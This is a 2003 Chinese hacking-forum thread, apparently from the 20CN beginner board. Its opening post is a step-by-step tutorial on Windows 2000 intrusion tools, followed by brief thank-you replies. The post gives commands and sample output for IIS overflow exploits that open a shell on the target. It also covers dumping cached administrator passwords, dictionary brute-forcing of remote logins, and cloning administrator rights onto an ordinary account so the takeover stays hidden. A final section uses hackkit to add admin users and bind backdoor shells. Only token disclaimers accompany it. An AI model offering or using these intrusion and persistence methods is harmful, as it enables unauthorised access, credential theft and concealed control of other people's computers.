论坛: 菜鸟乐园 标题: 命令行下常用黑客工具的使用方法及技巧(一) 复制本贴地址    
作者: fjs [fjs]    论坛用户   登录
    写这篇文章的目的不是告诉大家怎么去破坏别人机子,只是告诉一些黑客初学者怎么使用这些工具。使用工具不是目的,对国内的网络安全没有多大益处,也不容易提高自身的水平;要提高自身水平,多学些编程技术,掌握一些技术性的原理,以及更深层次的东西。
    请勿用于破坏国内主机,否则后果自负。
    以下工具都是在windows2000下测试的,大部分工具也都是针对Win2K
    以下所提到的工具在国内一些黑客网上都会找到,或者到百度、google里搜索。


1,IDAHack.exe:此工具是Windows2000 iis ida溢出攻击程序,在windows200+SP2以前的版本有此漏洞,用法如下:
idahack  <Host> <HostPort> <HostType> <ShellPort>
          IP      服务端口  补丁类型    溢出端口  
以下是各版本补丁的代号
    chinese  win2k     :       1
    chinese  win2k, sp1:       2
    chinese  win2k, sp2:       3
    english  win2k     :       4
    english  win2k, sp1:       5
    english  win2k, sp2:       6
    japanese win2k     :       7
    japanese win2k, sp1:       8
    japanese win2k, sp2:       9
    korea    win2k     :      10
    korea    win2k, sp1:      11
    korea    win2k, sp2:      12
    chinese     NT, sp5:      13
    chinese     NT, sp6:      14
例如:idahack 10.1.1.2 80 3 99
成功后会出现如下情况:
connceting...
sending...
checking...
Now you can telnet to 99 port 
good luck :)
-----------------
出现了good luck :)后,就说明溢出成功,此时你就可以telnet 10.1.1.2 99 到对方的机子上了,得到的是管理员权限,马上给建个用户,然后加到管理员组,OK,其他你想做什么不用我多说了吧


2,FindPass.exe:该工具主要用于查机器缓存里管理员密码的命令行工具
用法:直接输入findpass既可,
结果会出现:
...省略....
The logon information is: FJS/administrator/123456
...省略...
其中::FJS"为该机机名;"administrator"是该机当前用户;"123456"当然就是密码了
当然,如果你想查看远程机子缓存里的密码,得先把该工具上传到远程机子,至于用处很多人都以为这东西没什么大用,我个人认为可以用来查看远程机子里缓存里的密码,以后不不用再建个什么后门呀隐藏用户加到管理组什么的,而且远程主机的密码可能牵连到其他系统密码.


3,SMBCrack.exe:该工具用于高速破解远程服务器的口令程序。
用法如下:SMBCrack <IP> <Username> <Password file> [port]
                      远程机用户名    字典         端口(默认端口为80)     (字典先要自己编辑好)      
如何得到远程机用户名用扫描工具扫描就知道了,密码文件最好放在当前目录下,不然要加文件路径,端口一般写80
例如:SMBCrack 10.1.1.2 fjs passwd.txt 80
成功后,密码会显示到命令行下方


4:WMICracker.exe: 该工具也用于高速的破解远程服务器的口令不过占用CPU资源很高,所以个人认为没SMBCrack.exe好用。
用法如下:WMICracker <IP> <Username> <Password File> [port]   (默认端口为80)
用法和SMBCrack.exe一样,就不用我多说了吧,真不知道再来问我好了。


5:pulist.exe 该工具是在命令行下查看服务器进程的工具
用法直接输入:pulist.exe就可以看到了,功能和win2K下的windows任务管理器一样。主要一个功能是还可以查看远程机子的进程, 
用法:pulist IP 就可以看到远程机子的进程了,很不错吧!


6,iis5hack.exe 该工具是Windows 2000 .printf 溢出攻击程序!!(只对windows2000+SP1以前的版本有效)
使用方法如下:
iis5hack <Host> <HostPort> <HostType> <ShellPort>
          IP      服务端口  补丁类型   溢出端口
各版本代号:
 chinese edition:            0
 chinese edition, sp1:       1
 english edition:            2
 english edition, sp1:       3
 japanese edition:           4
 japanese edition, sp1:      5
 korea edition:              6
 korea edition, sp1:         7
 mexico edition:             8
 mexico edition, sp1:        9
例如:iis5hack 10.1.1.2 80 1 99 
成功后将会得到管理员权限,由于最近在家里找不着SP1以前的机子,所以不能给出成功后的情况,请大家自己判断吧,不过近来随着SP4的推出,SP1以前的版本真是很少了,不好找。


7,ca.exe  很有名的一个工具(还有个名字好像叫sa.exe),该工具用于克隆帐号。利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在,至于如何得到远程机上都有什么用户,用扫描器吧)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升
事先必需得到对方的管理员权限,主要用于入侵后克隆一个普通帐号.......
用法如下,事先我们得到了管理员用户为fjs密码为123456 ,现在我们把普通帐号TsInternetUser克隆成管理员
C:\>ca \\10.1.1.2 fjs 123456 TsInternetUser password
当出现如下情况时,说明克隆成功
......省略.........
Connect 10.1.1.12 ....OK
Get SID of TsInternetUser ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
呵呵,好了,现在你有一个看起来是普通帐号的管理员了,如果不用专门的工具查看,被被克隆的帐号是很难发现的,记得不要做坏事哦!!


8,caa.exe  用于检查机子里是否有被克隆的帐号
用法如下:cca \\IP 管员帐户 密码
例如:cca \\10.1.1.2 fjs 123456  如果有克隆帐号的话,将会显示出来哪些是克隆帐号

9,ap.exe  erlIS.dll的溢出攻击工具,可在7788得到shell。
使用方法:ap.exe <hosename> [sp]  SP代号
例如:ap.exe 10.1.1.2 2
成功后会出现如下情况:
C:\1\cmd>ap.exe 10.1.1.2 2
Connected...
send shellcode...
all done!
you can telnet 10.1.1.2 2 7788

此时你可以telnet 10.1.1.2 7788 得到的是管理员权限,telnet上后你想做什么都行,记得,不要做坏事呀,否则后果自负!!


10,hackkit.exe 该工具据说功能强大,用于得到管理员密码后的入侵。
用法如下:hackkit [host] [参数]
主要参数有:
-start SRVNAME
-stop SRVNAME
-remove SRVNAME
-adduser [user] [passwd]
-deluser [user]
-opendoor [port]
-closedoor
各参数说明:
-info 取得远程主机服务信息
-start 启动远程主机服务
-stop 停止远程主机服务
-adduser 在远程主机上添加username/passwd的用户,administrator权限
-deluser 在远程主机上删除username用户

-opendoor 在远程主机的端口上绑定一个shell,然后telnet xxx.xxx.xxx.xxx 
-closedoor 登出远程主机后别忘了关闭刚才开的“门“。:}

真可谓是功能强大,不过本人只用过一些,现介绍如下:
例1:hackkit 10.1.1.2 -info 
此功能显示远程主机的服务,会显示出每个服务的状态以及总共多少服务,已启动了多少,未启动的多少。
例2:hackkit 10.1.1.2 -start w32time (服务名)
当出现:[w32time] on \\FJS started successful!时,说明启动成功,这时,你用hackkit 10.1.1.2 -info看看是不是该服务已启动成功
同理,停止服务的命令也类似:hackkit 10.1.1.2 -stop w32time (服务名)
当出现:[w32time] on \\FJS stopped successful!时,说明停止成功,这时,你用hackkit 10.1.1.2 -info看看是不是该服务已停止了
例3:添加用户 hackkit 10.1.1.2 -adduser fjs 123456
成功后出现如下情况:Add a user <fjs> on [FJS] successfully!
此时说明,你已成功给远程主机添加了一个用户名为fjs密码为123456的管理员组的用户了。
后面几个功能用法也基本差不多,自己看吧,不明白再来问我,

晕了,一个晚上才写这么点东东,还有一些工具过两天再整理吧,如果本篇文章对您有帮助的话,或者哪些地方有错误的话,请您告诉我,我会继续努力的。

 作者:FJS   E-mail:fjsabc@163.com   QQ:23762216    2003年8月27日
                                                                                       





地主 发表时间: 08/28 21:11

回复: cncd [cncd]   论坛用户   登录
谢谢.

B1层 发表时间: 08/28 21:21

回复: bfn693 [bfn693]   论坛用户   登录
顶一个吧~~~

B2层 发表时间: 08/28 22:11

回复: fjs [fjs]   论坛用户   登录
没人看,不写了

B3层 发表时间: 08/30 19:53

回复: ganjiawei [ganjiawei]   论坛用户   登录
看啊   要是告诉能下这工具的地址更好(要安全一点喽)

B4层 发表时间: 08/30 21:16

回复: Alian [miku]   论坛用户   登录
这些是基本的,怎么会没有人看了
难道20CN里就没有菜鸟了吗?
不可能!

B5层 发表时间: 08/30 21:33

回复: cwenqiang [cwenqiang]   论坛用户   登录
我是菜鸟~

B6层 发表时间: 08/30 22:55

回复: lyc_0135 [lyc_0135]   论坛用户   登录
我也是菜鸟

B7层 发表时间: 08/31 06:31

回复: jamesgj [jamesgj]   论坛用户   登录
俺也是菜鸟!呵呵!:)

B8层 发表时间: 09/03 14:06

回复: lucky_ya [lucky_ya]   论坛用户   登录
新来的菜鸟.

B9层 发表时间: 09/03 16:51

回复: icepoint [icepoint]   论坛用户   登录
其实我也只是略懂皮毛,还是要谢谢这位大侠.我有个问题,就是如何可以绕过NTML的验证.我试过很多方法了,有一个可行但是对自己不安全.请问有没有安全或者更好的方法呢?

B10层 发表时间: 09/03 18:02

回复: bcliangzi [bcliangzi]   论坛用户   登录
菜鸟都就多发一些呀!共同分享嘛!

B11层 发表时间: 09/03 18:56

回复: shadow [yyfzlh]   论坛用户   登录
谢谢,对我了解编程有一定帮助,go on ~~~~~

B12层 发表时间: 09/04 00:41

回复: rainy [rainy]   论坛用户   登录
我也是菜鸟!1!!!!!!

B13层 发表时间: 09/04 21:43

回复: fjs [fjs]   论坛用户   登录
呵呵,另一篇总算写出来了,

B14层 发表时间: 09/10 18:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号